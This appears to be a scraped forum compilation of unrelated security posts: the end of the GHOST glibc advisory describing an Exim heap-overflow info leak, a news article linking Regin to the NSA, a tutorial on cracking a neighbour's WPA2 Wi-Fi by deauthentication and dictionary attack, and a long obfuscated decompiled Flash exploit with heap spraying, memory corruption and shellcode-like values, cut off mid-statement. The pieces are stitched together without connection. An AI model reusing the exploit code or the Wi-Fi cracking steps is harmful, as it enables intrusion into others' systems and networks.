free chunk of memory with a slightly larger size: |< malloc_chunk | -----|----------------------|---+-------------------------|----- ... | gethostbyname buffer |p|s|f|b|F|B| next free chunk | ... -----|----------------------|---+-------------------------|----- | X| |------------------------->| overflow As a result, this artificially-enlarged free chunk overlaps another block of memory, where Exim saves the error message "503 sender not yet given\r\n" for later use: |< malloc_chunk | -----|----------------------|-----------------------------|----------+----|----- ... | gethostbyname buffer |p|s|f|b|F|B| real free chunk | error message | ... -----|----------------------|-----------------------------|----------+----|----- | | |<-------------------------------------->| artificially enlarged free chunk Then, we partially allocate the artificially-enlarged free chunk, thereby splitting it in two: the newly allocated chunk, and a smaller, free chunk (the remainder from the split). The malloc_chunk header for this remaining free chunk overwrites the very beginning of the saved error message with a pointer to the heap (the fd_nextsize pointer): |< malloc_chunk |< malloc_chunk | | -----|----------------------|---------------------+-------|----------+----|----- ... | gethostbyname buffer |p|s|f|b|F|B| aaaaaaa |p|s|f|b|F|B| r message | ... -----|----------------------|---------------------+-------|----------+----|----- | | X | |<------------------->|<---------------->| allocated chunk free chunk Finally, we send an invalid SMTP command to Exim, and retrieve the fd_nextsize heap pointer from Exim's SMTP response, which includes the corrupted error message. This effectively turns gethostbyname's buffer overflow into an information leak; moreover, it allows us to distinguish between 32-bit and 64-bit machines. --[ 6 - Acknowledgments ]----------------------------------------------------- We would like to thank Alexander Peslyak of the Openwall Project for his help with the disclosure process of this vulnerability. Sursa: https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt

Link between NSA and Regin cyberespionage malware becomes clearer Lucian Constantin Jan 27, 2015 4:00 AM Keylogging malware that may have been used by the NSA shares signficant portions of code with a component of Regin, a sophisticated platform that has been used to spy on businesses, government institutions and private individuals for years. The keylogger program, likely part of an attack framework used by the U.S. National Security Agency and its intelligence partners, is dubbed QWERTY and was among the files that former NSA contractor Edward Snowden leaked to journalists. It was released by German news magazine Der Spiegel on Jan. 17 along with a larger collection of secret documents about the malware capabilities of the NSA and the other Five Eyes partners—the intelligence agencies of the U.K., Canada, Australia and New Zealand. “We’ve obtained a copy of the malicious files published by Der Spiegel and when we analyzed them, they immediately reminded us of Regin,” malware researchers from antivirus firm Kaspersky Lab said Tuesday in a blog post. “Looking at the code closely, we conclude that the ‘QWERTY’ malware is identical in functionality to the Regin 50251 plugin.” Moreover, the Kaspersky researchers found that both QWERTY and the 50251 plug-in depend on a different module of the Regin platform identified as 50225 which handles kernel-mode hooking. This component allows the malware to run in the highest privileged area of the operating system—the kernel. This is strong proof that QWERTY can only operate as part of the Regin platform, the Kaspersky researchers said. “Considering the extreme complexity of the Regin platform and little chance that it can be duplicated by somebody without having access to its source code, we conclude the QWERTY malware developers and the Regin developers are the same or working together.” Der Spiegel reported that QWERTY is likely a plug-in of a unified malware framework codenamed WARRIORPRIDE that is used by all Five Eye partners. This is based on references in the code to a dependency called WzowskiLib or CNELib. In a separate leaked document authored by the Communications Security Establishment Canada, the Canadian counterpart of the NSA, WARRIORPRIDE is described as a flexible computer network exploitation (CNE) platform that’s an implementation of the “WZOWSKI” Five Eyes API (application programming interface). The document also notes that WARRIORPRIDE is known under the code name DAREDEVIL at the UK Government Communications Headquarters (GCHQ) and that the Five Eyes intelligence partners can create and share plug-ins for it. The newly discovered link between QWERTY and Regin suggests that the cyberespionage malware platform security researchers call Regin is most likely WARRIORPRIDE. Some experts already suspected this based on other clues. According to Kaspersky Lab, Regin was the malware program that infected the personal computer of Belgian cryptographer Jean-Jacques Quisquater in 2013. That attack was linked to another malware attack against Belgian telecommunications group Belgacom whose customers include the European Commission, the European Parliament and the European Council. Der Spiegel reported in September 2013, based on documents leaked by Snowden, that GCHQ was responsible for the attack on Belgacom as part of a secret operation code-named Operation Socialist. Ronald Prins, co-founder of Fox-IT, a Dutch security company hired to investigate the attack against Belgacom, told The Intercept in November that he was convinced Regin was used by British and American intelligence services. The Intercept also reported, citing unnamed sources, that the malware was used in attacks against the European Parliament. An NSA spokeswoman said at the time that the agency would not comment on The Intercept’s “speculation.” The existence of Regin was first disclosed in November, when both Kaspersky Lab and Symantec published extensive research papers on it. However, antivirus companies knew about the malware for at least a year prior to that and forensic evidence suggests that the threat may have been active as far back as 2006. Security researchers believe that Regin is comparable in sophistication to Stuxnet, the computer worm reportedly created by the U.S. and Israel that was used to sabotage Iran’s nuclear efforts by destroying uranium enrichment centrifuges. However, unlike Stuxnet, Regin was mostly used for espionage, not sabotage. Symantec found around 100 Regin victims in 10 countries, mostly in Russia and Saudi Arabia, but also in Mexico, Ireland, India, Afghanistan, Iran, Belgium, Austria and Pakistan. The main targets were telecom operators, government organizations, multi-national political bodies, financial institutions, research centers and individuals involved in advanced mathematical and cryptographical research, according to Kaspersky Lab. No new infections with Regin have been found since mid-2014, said Costin Raiu, director of Kaspersky’s global research and analysis team, via email Monday. It’s not clear whether the malware platform’s authors are working to completely replace it because it has been exposed or are just making significant changes to it. “We believe it would be very difficult to replace the whole Regin platform with something else,” Raiu said. “Therefore, it is more likely it will be modified and improved instead of completely replaced.” Autor: Lucian Constantin @ PCWorld Sursa: http://www.pcworld.com/article/2876112/link-between-nsa-and-regin-cyberespionage-malware-becomes-clearer.html

How to Crack a Wpa2-Psk Password with Windows Syed Balal Rumy+Posted By on Aug 5, 2013 | 34 comments How to Crack a Wpa2-Psk Password with Windows :- It,s very common question on the internet to How to hack a Facebook account password and how to hack a WiFi password. Even if you search on YouTube you will find a lots of tutorial to How to hack a WiFi password using backtrack. However, backtrack OS is not most handy OS for normal users. yesterday my one Facebook friend Lovito Tsuqu Kiho ask me to how to hack WiFi using commview using aircrack-ng. Today i am going to show you how to a crack a Wp2-psk password with windows machine. Software Requirement for this lab :- 1. CommView for Wifi ( Download) 2. Elcomsoft Wireless Security Auditor (Download) Presently i am connected with my own wifi network Virusfound and i want to hack the password of Ultimate that is secured with Wpa2-psk encryption. First you need to be capture the Wpa2, four-way handsake with CommView. Open commView and click on the Start option then click on the capture option to start the capture now it will show you all available AP, Now click on the Tools > Select the Node Reassoication option ( if Node Rassociation is not working , then use WiFi Alfa card ) now select your target AP in the Send a deauthentication request from this AP option. it will show you all available client option. now click on the Send Now option to send the packet for 4-way authentication. wait for some time so it will capture the packet. now click on the Save option and choose your file format Commview Capture Files (*.ncf) you capture work is done. Now open Elcomsoft Wireless Security Auditor tocrack your wifi password. Click on the Import Data tab > select the Import CommViewLog option. now it will show you information about AP and Multiple Handshake selection information. Click on Ok. now click on the Start attack option and select the Dictionary Attack option. However you have other attack options are also available. now within minutes it will found your password and it will show you the password. Enjoy Wifi Hacking with Windows machine. This video will help you in packet capture. Sursa: http://rumyittips.com/how-to-crack-a-wpa2-psk-password-with-windows/

package { import flash.system.*; import flash.display.*; import flash.events.*; import flash.utils.*; public final class catch for extends MovieClip { { var _loc1_ = true; var _loc2_ = false; } public function catch for() { var _loc2_ = false; var _loc3_ = true; this.52142310723120123423632234 = new Shader(); this.implements = 52142315423167123423632234.package for(); this.implements var = 52142317523188123423632234.52142315723170123423632234(); this.521423832396123423632234 = this.implements var[_a_--._a_--(-1820302799)](2); this.static set = this.52142318023193123423632234; this.include = this.52142318023193123423632234; this.521423342347123423632234 = 5770 * this.break const; this.extends for = 510 * this.break const; super(); if(stage) { this.continue(); } else { addEventListener(Event.ADDED_TO_STAGE,this.continue); } } private var 52142310723120123423632234:Shader; private var implements:ByteArray; private var return:Boolean = false; private var 52142318723200123423632234:String = "3H1mc7hH2JGHNRBs0ADzSJQhGXNgFOT1uCXcv/DdaltYI9AkbiEjDeI/ig=="; private var 521423192332123423632234:Number = 40; private var static for:uint = 0; private var false const:52142312223135123423632234; private var implements var:String; private var 521423832396123423632234:String; private var final var:ByteArray = null; private var 521423692382123423632234:uint = 4.277009102E9; private var static set:uint; private var 521423862399123423632234:ByteArray = null; private var while for:uint = 3.149642683E9; private var include:uint; private var dynamic const:Boolean = false; private var break var:uint = 4096; private var true const:uint = 1.2582912E7; private var each for:uint = 1073741824; private var 52142313623149123423632234:uint = 3.133078208E9; private var if:uint = 3.133078209E9; private var 521423532366123423632234:uint = 3.133078211E9; private var 5214239723110123423632234:uint = 3.435973836E9; private var 5214239123104123423632234:uint = 3.722304989E9; private var break const:int = 2; private var 521423342347123423632234:uint; private var 52142317123184123423632234:uint = 114; private var 521423282341123423632234:uint = 4.276992702E9; private var 521423752388123423632234:uint = 3.133078222E9; private var null const:int = 504; private var 52142318023193123423632234:int = 8192; private var extends for:int; private var with for:Vector.<Object> = null; private var 521423262339123423632234:Vector.<Object> = null; private var break for:int = 0; private var 52142311923132123423632234:Vector.<uint> = null; private var 52142318423197123423632234:uint = 0; private var throw var:uint = 0; private var 52142318223195123423632234:uint = 0; private var in for:uint = 0; private var do:uint = 0; private var 52142311823131123423632234:uint = 0; private var 521423822395123423632234:uint = 0; private var super for:uint = 0; private var 52142310923122123423632234:Vector.<uint> = null; private var 52142352318123423632234:uint = 9460301; private var 52142316123174123423632234:uint = 50068; private var null:uint = 65535; private var 521423442357123423632234:uint = 3.272131715E9; private var throw:uint = 6816874; private var finally var:uint = 1744830496; private var class:uint = 1048576; private var 521423152328123423632234:uint = 6816106; private var 5214238723100123423632234:uint = 1744830496; private var function const:uint = 2097152; private var 521423492362123423632234:uint = 6816874; private var native:uint = 1442840592; private var 521423102323123423632234:uint = 4.283498891E9; private var 52142315223165123423632234:uint = 2128; private var 521423582371123423632234:uint = 65535; private var import var:uint = 0; private var super var:uint = 0; private var continue const:uint = 0; private var 521423482361123423632234:uint = 0; private var override const:uint = 0; private var 521423382351123423632234:uint = 50070; private var 52142312314123423632234:uint = 50069; private var 52142311423127123423632234:uint = 50065; private var 52142317223185123423632234:uint = 50071; private var 5214239023103123423632234:uint = 0; private var 521423332346123423632234:uint = 0; private var var for:uint = 0; private var 521423392352123423632234:uint = 0; private var 5214239823111123423632234:uint = 0; private var 52142315023163123423632234:uint = 0; private var const set:uint = 0; private var override for:uint = 0; private var get set:uint = 0; private var 52142314323156123423632234:uint = 0; private var 52142315623169123423632234:uint = 0; private var 521423812394123423632234:uint = 0; private var package:Boolean = false; private var 521423612374123423632234:Boolean = false; private var true set:Boolean = false; private var while:Boolean = false; private var case var:Boolean = false; private var 52142310323116123423632234:Boolean = false; private var return const:Boolean = false; private var static:String = null; private var 521423302343123423632234:String = null; private var 5214239223105123423632234:String = null; private var each var:uint = 0; private final function import const() : uint { var _loc6_ = false; var _loc7_ = true; var _loc1_:String = Capabilities.version.toLowerCase(); if(_loc1_.length < 4) { return 0; } var _loc2_:String = _loc1_.substr(0,4); if(_loc2_ != _a_--._a_--(-1820302785)) { return 0; } _loc1_ = _loc1_.substr(4); var _loc3_:Array = _loc1_.split(","); if(_loc3_.length != 4) { return 0; } var _loc4_:uint = 0; var _loc5_:uint = 0; _loc4_ = uint(_loc3_[0]); _loc5_ = _loc5_ + _loc4_; _loc4_ = uint(_loc3_[1]); _loc5_ = _loc5_ * 10; _loc5_ = (_loc5_ * 10) + _loc4_; _loc4_ = uint(_loc3_[2]); _loc5_ = _loc5_ * 1000; _loc5_ = (_loc5_ * 1000) + _loc4_; _loc4_ = uint(_loc3_[3]); _loc5_ = _loc5_ * 1000; _loc5_ = (_loc5_ * 1000) + _loc4_; return _loc5_; } private final function 52142317723190123423632234() : Boolean { var _loc2_ = false; var _loc3_ = true; this.each var = this.import const(); if(this.each var == 0) { return false; } this.static = Capabilities.os.toLowerCase(); this.521423302343123423632234 = Capabilities.playerType.toLowerCase(); this.5214239223105123423632234 = String(this.each var); if(!(this.521423302343123423632234 == _a_--._a_--(-1820302800)) && !(this.521423302343123423632234 == _a_--._a_--(-1820302786))) { return false; } this.true set = this.static == "windows 8"; this.while = this.static == "windows 8.1"; this.case var = this.while; this.52142310323116123423632234 = (this.true set) || (this.while) || (this.case var); this.return const = this.each var >= 52142317523188123423632234.var(3.937018648E9); this.return = this.each var <= 52142317523188123423632234.var(3.847817204E9) || this.each var >= 52142317523188123423632234.var(3.847387335E9) && this.each var <= 52142317523188123423632234.var(3.857011825E9); var _loc1_:Boolean = this.each var >= 52142317523188123423632234.var(3.857011908E9) && this.each var < 52142317523188123423632234.var(3.926051399E9) || this.each var == 52142317523188123423632234.var(3.937018673E9) || this.each var >= 52142317523188123423632234.var(3.956513196E9); return _loc1_; } private final function 52142313723150123423632234(param1:ByteArray, param2:int) : void { var _loc4_ = true; var _loc5_ = false; param1.position = 0; var _loc3_ = 0; while(_loc3_ < param1.length / 4) { param1.writeInt(param2); _loc3_++; } param1.position = 0; } private final function with const(param1:uint) : uint { var _loc3_ = true; var _loc4_ = false; var _loc2_:uint = param1 / 4; return _loc2_ - this.throw var & this.each for - 1; } private final function var set(param1:uint) : uint { var _loc9_ = true; var _loc10_ = false; var _loc2_:uint = this.with const(param1); var _loc3_:uint = param1 % 4; if(_loc3_ == 0) { return this.52142311923132123423632234[_loc2_]; } var _loc4_:uint = 1 << _loc3_ * 8; var _loc5_:uint = 1 << (4 - _loc3_) * 8; var _loc6_:uint = this.52142311923132123423632234[_loc2_]; var _loc7_:uint = this.52142311923132123423632234[_loc2_ + 1]; _loc6_ = _loc6_ / _loc4_; _loc7_ = _loc7_ * _loc5_; var _loc8_:uint = _loc6_ | _loc7_; return _loc8_; } private final function 52142316823181123423632234(param1:uint, param2:uint) : void { var _loc5_ = true; var _loc6_ = false; var _loc3_:uint = this.with const(param1); var _loc4_:uint = param1 % 4; if(_loc4_ == 0) { this.52142311923132123423632234[_loc3_] = param2; return; } } private final function var var(param1:int) : int { return op_li32(param1) /*Alchemy*/; } private final function 52142314723160123423632234(param1:uint) : uint { return uint(this.var var(int(param1))); } private final function extends set(param1:int, param2:int) : void { } private final function 521423512364123423632234(param1:uint, param2:uint) : void { this.extends set(int(param1),int(param2)); } private final function include set() : Boolean { var _loc5_ = true; var _loc6_ = false; this.521423862399123423632234 = new ByteArray(); this.521423862399123423632234.endian = Endian.LITTLE_ENDIAN; this.final var = new ByteArray(); this.final var.endian = Endian.LITTLE_ENDIAN; this.final var.position = 0; var _loc1_ = 0; while(_loc1_ < this.static set / 4) { this.final var.writeUnsignedInt(this.521423692382123423632234 + _loc1_); _loc1_++; } this.final var[this.521423832396123423632234](); var _loc2_:uint = 512; this.final var.position = _loc2_; var _loc3_:int = _loc2_; while(_loc3_ < this.final var.length) { this.final var.writeByte(_loc3_); _loc3_++; } ApplicationDomain.currentDomain.domainMemory = this.final var; return true; } private final function 52142315923172123423632234() : int { var _loc2_ = false; var _loc3_ = true; var _loc1_:int = this.extends for * 4 / 5; if(_loc1_ % 2 == 0) { _loc1_++; } return _loc1_; } private final function 52142316923182123423632234() : void { /* * Decompilation error * Code may be obfuscated * Error type: TranslateException */ throw new IllegalOperationError("Not decompiled due to error"); } private final function 52142314223155123423632234() : void { var _loc4_ = true; var _loc5_ = false; var _loc1_ = 0; var _loc2_:ByteArray = null; var _loc3_:int = this.52142315923172123423632234(); _loc1_ = 0; while(_loc1_ < this.extends for) { if(_loc1_ == _loc3_) { this.521423862399123423632234.clear(); } _loc1_++; } } private final function 521423802393123423632234() : void { var _loc3_ = false; var _loc4_ = true; var _loc1_:uint = 0; var _loc2_:Vector.<uint> = null; this.521423262339123423632234 = new Vector.<Object>(this.521423342347123423632234); _loc1_ = 0; while(_loc1_ < this.521423342347123423632234) { this.521423262339123423632234[_loc1_] = new Vector.<uint>(); _loc1_++; } _loc1_ = 0; while(_loc1_ < this.521423342347123423632234) { _loc2_ = this.521423262339123423632234[_loc1_] as Vector.<uint>; _loc2_.length = this.52142317123184123423632234; _loc2_[0] = this.521423282341123423632234; _loc2_[1] = _loc1_; _loc2_[2] = this.521423752388123423632234; _loc1_++; } } private final function 521423722385123423632234() : Boolean { var _loc2_ = false; var _loc3_ = true; var _loc1_:uint = this.52142314723160123423632234(0); if(_loc1_ != this.while for) { return false; } this.52142314223155123423632234(); this.521423802393123423632234(); _loc1_ = this.52142314723160123423632234(0); if(_loc1_ == this.while for) { return false; } return true; } private final function while var() : Boolean { var _loc4_ = false; var _loc5_ = true; var _loc1_:uint = 0; var _loc2_:uint = 0; var _loc3_:uint = this.52142318023193123423632234; while(_loc2_ < _loc3_) { _loc1_ = this.52142314723160123423632234(_loc2_); if(_loc1_ == this.52142317123184123423632234) { _loc1_ = this.52142314723160123423632234(_loc2_ + (this.static for << 3)); if(_loc1_ == this.521423282341123423632234) { this.dynamic const = false; this.521423512364123423632234(_loc2_,this.each for); return true; } _loc1_ = this.52142314723160123423632234(_loc2_ + 16); if(_loc1_ == this.521423282341123423632234) { this.dynamic const = true; this.521423512364123423632234(_loc2_,this.each for); return true; } } _loc2_ = _loc2_ + (this.static for << 2); } return false; } private final function const const() : Boolean { var _loc3_ = true; var _loc4_ = false; var _loc1_:Vector.<uint> = null; var _loc2_ = 0; while(_loc2_ < this.521423342347123423632234) { _loc1_ = this.521423262339123423632234[_loc2_] as Vector.<uint>; if(!(_loc1_.length == this.52142317123184123423632234) && !(_loc1_.length == this.52142317123184123423632234 * 2)) { this.break for = _loc2_; this.52142311923132123423632234 = _loc1_; return true; } _loc2_++; } return false; } private final function 52142312023133123423632234() : uint { var _loc7_ = true; var _loc8_ = false; var _loc1_:uint = this.52142318023193123423632234 * 8; var _loc2_:uint = _loc1_ / 4; var _loc3_:uint = 0; var _loc4_:uint = 0; var _loc5_:uint = 0; var _loc6_:uint = 0; while(_loc5_ < _loc2_) { _loc3_ = this.52142311923132123423632234[_loc5_]; if(_loc3_ == this.52142313623149123423632234) { _loc4_ = _loc5_; break; } _loc5_++; } _loc6_ = _loc4_ * 4; return _loc6_; } private final function 52142332316123423632234(param1:uint) : uint { var _loc8_ = false; var _loc9_ = true; var _loc2_:uint = this.52142318023193123423632234 * 8; var _loc3_:uint = _loc2_ / 4; var _loc4_:uint = 0; var _loc5_:uint = 0; var _loc6_:uint = param1 / 4; var _loc7_:uint = 0; while(_loc6_ < _loc3_) { _loc4_ = this.52142311923132123423632234[_loc6_]; if((this.52142311923132123423632234[_loc6_]) == this.521423282341123423632234) { _loc4_ = this.52142311923132123423632234[_loc6_ + 2]; if((this.52142311923132123423632234[_loc6_ + 2]) == this.521423752388123423632234) { this.521423822395123423632234 = this.52142311923132123423632234[_loc6_ + 1]; _loc5_ = _loc6_; break; } } _loc6_++; } _loc7_ = _loc5_ * 4; return _loc7_; } private final function 52142392322123423632234() : Boolean { var _loc15_ = false; var _loc16_ = true; var _loc1_:uint = this.52142312023133123423632234(); if(_loc1_ == 0) { return false; } var _loc2_:uint = this.break var - _loc1_ % this.break var; var _loc3_:uint = _loc2_ % this.null const; if(_loc3_ == 40) { if(this.dynamic const) { return false; } } else if(_loc3_ == 80) { if(!this.dynamic const) { return false; } } else { return false; } var _loc4_:uint = 8; var _loc5_:uint = 32; var _loc6_:uint = 0; var _loc7_:uint = 28; if(this.dynamic const) { _loc4_ = 16; _loc5_ = 64; _loc6_ = 0; _loc7_ = 56; } var _loc8_:uint = this.52142332316123423632234(_loc1_ + this.52142318023193123423632234); if(_loc8_ == 0) { return false; } _loc8_ = _loc8_ - _loc4_; var _loc9_:uint = _loc8_ / 4; if(!this.dynamic const) { this.52142318223195123423632234 = this.52142311923132123423632234[_loc9_ + 1]; } else { this.52142318223195123423632234 = this.52142311923132123423632234[_loc9_ + 2]; this.5214239823111123423632234 = this.52142311923132123423632234[_loc9_ + 3]; } var _loc10_:uint = (_loc8_ - _loc1_) % this.break var; var _loc11_:uint = _loc8_ - _loc10_; this.52142310923122123423632234 = this.521423262339123423632234[this.521423822395123423632234] as Vector.<uint>; this.52142310923122123423632234.length = this.52142317123184123423632234 * 2; var _loc12_:uint = _loc11_ + _loc6_; _loc9_ = _loc12_ / 4; this.super for = this.52142311923132123423632234[_loc9_]; this.52142318423197123423632234 = this.super for - _loc8_; this.throw var = this.52142318423197123423632234 / 4; this.import var = this.52142318423197123423632234 + _loc1_; _loc9_ = (_loc11_ + _loc7_) / 4; this.in for = this.52142311923132123423632234[_loc9_++]; this.52142315023163123423632234 = this.52142311923132123423632234[_loc9_]; this.521423822395123423632234++; this.52142310923122123423632234 = this.521423262339123423632234[this.521423822395123423632234] as Vector.<uint>; return true; } private final function 52142314923162123423632234() : void { var _loc2_ = true; var _loc3_ = false; var _loc1_:uint = this.each for - 2; this.52142311923132123423632234[_loc1_] = this.52142317123184123423632234; _loc1_ = this.each for - 1; this.52142311923132123423632234[_loc1_] = this.52142318223195123423632234; } private final function default var() : Boolean { var _loc7_ = false; var _loc8_ = true; var _loc1_:uint = 0; var _loc2_:uint = 0; var _loc3_:uint = 0; var _loc4_:uint = 0; var _loc5_:uint = this.in for & ~(this.break var - 1); while(true) { _loc1_ = this.var set(_loc5_); if(_loc1_ == this.52142352318123423632234) { break; } _loc5_ = _loc5_ - this.break var; } _loc5_ = _loc5_ + this.break var; var _loc6_:uint = (_loc5_ + this.break var) + this.true const; while(this.continue const == 0 || this.521423482361123423632234 == 0 || this.override const == 0 || this.521423332346123423632234 == 0 || this.var for == 0 || this.521423392352123423632234 == 0 || this.5214239023103123423632234 == 0 || this.super var == 0) { _loc1_ = this.var set(_loc5_); if(this.super var == 0) { if(_loc1_ == this.521423102323123423632234) { _loc3_ = this.var set(_loc5_ + 4); if((_loc3_ & this.521423582371123423632234) == this.52142315223165123423632234) { this.super var = _loc5_; _loc5_ = _loc5_ + 5; continue; } } } if(this.continue const == 0) { if((_loc1_ & this.null) == this.52142316123174123423632234) { this.continue const = _loc5_; _loc5_ = _loc5_ + 2; continue; } } if(this.521423332346123423632234 == 0) { if((_loc1_ & this.null) == this.52142312314123423632234) { this.521423332346123423632234 = _loc5_; _loc5_ = _loc5_ + 2; continue; } } if(this.var for == 0) { if((_loc1_ & this.null) == this.52142311423127123423632234) { this.var for = _loc5_; _loc5_ = _loc5_ + 2; continue; } } if(this.5214239023103123423632234 == 0) { if((_loc1_ & this.null) == this.521423382351123423632234) { this.5214239023103123423632234 = _loc5_; _loc5_ = _loc5_ + 2; continue; } } if(this.521423392352123423632234 == 0) { if((_loc1_ & this.null) == this.52142317223185123423632234) { this.521423392352123423632234 = _loc5_; _loc5_ = _loc5_ + 2; continue; } } if(this.521423482361123423632234 == 0) { if(_loc1_ == this.521423442357123423632234) { this.521423482361123423632234 = _loc5_; _loc5_ = _loc5_ + 4; continue; } } if(this.override const == 0) { _loc2_ = _loc1_; _loc3_ = 0; _loc4_ = 0; if(_loc2_ == this.throw) { _loc3_ = this.var set(_loc5_ + 4); if(_loc3_ == this.finally var) { _loc4_ = this.var set(_loc5_ + 8); if((this.var set(_loc5_ + 8)) == this.class) { this.override const = this.var set(this.var set(_loc5_ + 15)); _loc5_ = _loc5_ + 12; continue; } } } if(_loc2_ == this.521423492362123423632234) { _loc3_ = this.var set(_loc5_ + 4); if(_loc3_ == this.native) { this.override const = this.var set(this.var set(_loc5_ + 11)); _loc5_ = _loc5_ + 8; this.521423612374123423632234 = true; continue; } } if(_loc2_ == this.521423152328123423632234) { _loc3_ = this.var set(_loc5_ + 4); if(_loc3_ == this.5214238723100123423632234) { _loc4_ = this.var set(_loc5_ + 8); if((this.var set(_loc5_ + 8)) == this.function const) { this.override const = this.var set(this.var set(_loc5_ + 15)); _loc5_ = _loc5_ + 12; this.package = true; continue; } } } } if(++_loc5_ > _loc6_) { return false; } } return true; } private final function const for(param1:ByteArray) : void { var _loc11_ = true; var _loc12_ = false; var _loc10_:uint = 0; var _loc2_:uint = 4 * 1024; var _loc3_:uint = this.52142318023193123423632234 - _loc2_; var _loc4_:uint = this.import var; this.52142311823131123423632234 = _loc4_ + _loc3_; var _loc5_:uint = 1024; var _loc6_:uint = _loc3_ - _loc5_; this.do = _loc4_ + _loc6_; var _loc7_:uint = this.do + 384; this.52142316823181123423632234(this.do + 4,65536); this.52142316823181123423632234(this.do + 428,0); this.52142316823181123423632234(this.do + 484,_loc7_); this.52142316823181123423632234(_loc7_,this.52142311823131123423632234); this.52142316823181123423632234(_loc7_ + 4,1); var _loc8_:uint = 512; var _loc9_:uint = this.52142311823131123423632234; this.52142316823181123423632234(_loc9_,this.521423482361123423632234); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,this.super var); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,this.continue const); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,this.5214239023103123423632234); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,this.var for); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,this.521423392352123423632234); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,this.override const); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,_loc9_ + 20); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,this.52142311823131123423632234); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,8192); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,4096); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,64); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,2943072); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,3.32824576E9); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,2.298479687E9); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,3.224501492E9); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,3.213711176E9); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,4.294966912E9); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,3.104065417E9); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,512); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,2.868104961E9); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,3.355347295E9); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,6214); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,3.296919552E9); _loc9_ = _loc9_ + 4; this.52142316823181123423632234(_loc9_,2.425406216E9); _loc9_ = _loc9_ + 4; param1.position = 0; while(param1.position < param1.length) { _loc10_ = param1.readUnsignedInt(); this.52142316823181123423632234(_loc9_,_loc10_); _loc9_ = _loc9_ + 4; } } private final function 521423742387123423632234() : Boolean { var _loc2_ = true; var _loc3_ = false; var _loc1_:uint = this.each for - 1; this.52142311923132123423632234[_loc1_] = this.do; this.52142311923132123423632234.length = this.52142317123184123423632234 * 2; this.52142314923162123423632234(); return true; } private final function get var() : ByteArray { var _loc1_ = false; var _loc2_ = true; return this.false const.break(this.static for); } private final function dynamic var() : void { var _loc1_ = false; var _loc2_ = true; this.52142311923132123423632234.length = this.52142317123184123423632234 * 2; } private final function 52142312323136123423632234() : Boolean { var _loc1_ = false; var _loc2_ = true; if(!throw for.52142312323136123423632234(this.521423302343123423632234,this.static,this.each var,this.in for)) { return false; } this.continue const = throw for.continue const; this.521423482361123423632234 = throw for.521423482361123423632234; this.override const = throw for.override const; this.const set = throw for.const set; this.override for = throw for.override for; this.get set = throw for.get set; this.52142314323156123423632234 = throw for.52142314323156123423632234; this.52142315623169123423632234 = throw for.52142315623169123423632234; this.521423812394123423632234 = throw for.521423812394123423632234; return true; } private final function throw set(param1:ByteArray) : void { var _loc12_ = true; var _loc13_ = false; var _loc11_:uint = 0; var _loc2_:uint = 4 * 1024 + 512; var _loc3_:uint = this.52142318023193123423632234 - _loc2_; var _loc4_:uint = this.import var; this.52142311823131123423632234 = _loc4_ + _loc3_; var _loc5_:uint = 1024; var _loc6_:uint = _loc3_ - _loc5_; this.do = _loc4_ + _loc6_; var _loc7_:uint = this.do + 384; this.52142316823181123423632234(this.do + 8,65536); this.52142316823181123423632234(this.do + 484,0); this.52142316823181123423632234(this.do + 528,_loc7_); this.52142316823181123423632234(this.do + 532,this.5214239823111123423632234); this.52142316823181123423632234(_loc7_,this.52142311823131123423632234); this.52142316823181123423632234(_loc7_ + 4,this.5214239823111123423632234); this.52142316823181123423632234(_loc7_ + 8,1); var _loc8_:uint = 768; var _loc9_:uint = 256; var _loc10_:uint = this.52142311823131123423632234; this.52142316823181123423632234(_loc10_,this.521423482361123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142315023163123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.continue const); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142315023163123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.const set); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142315023163123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,64); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,0); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142315623169123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142315023163123423632234); _loc10_ = _loc10_ + 4; _loc10_ = (_loc10_ + 4) + 40; this.52142316823181123423632234(_loc10_,this.override for); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142315023163123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142311823131123423632234 + _loc9_); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.5214239823111123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.get set); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,this.52142315023163123423632234); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,8192); _loc10_ = _loc10_ + 4; this.52142316823181123423632234(_loc10_,0); _loc10_ = 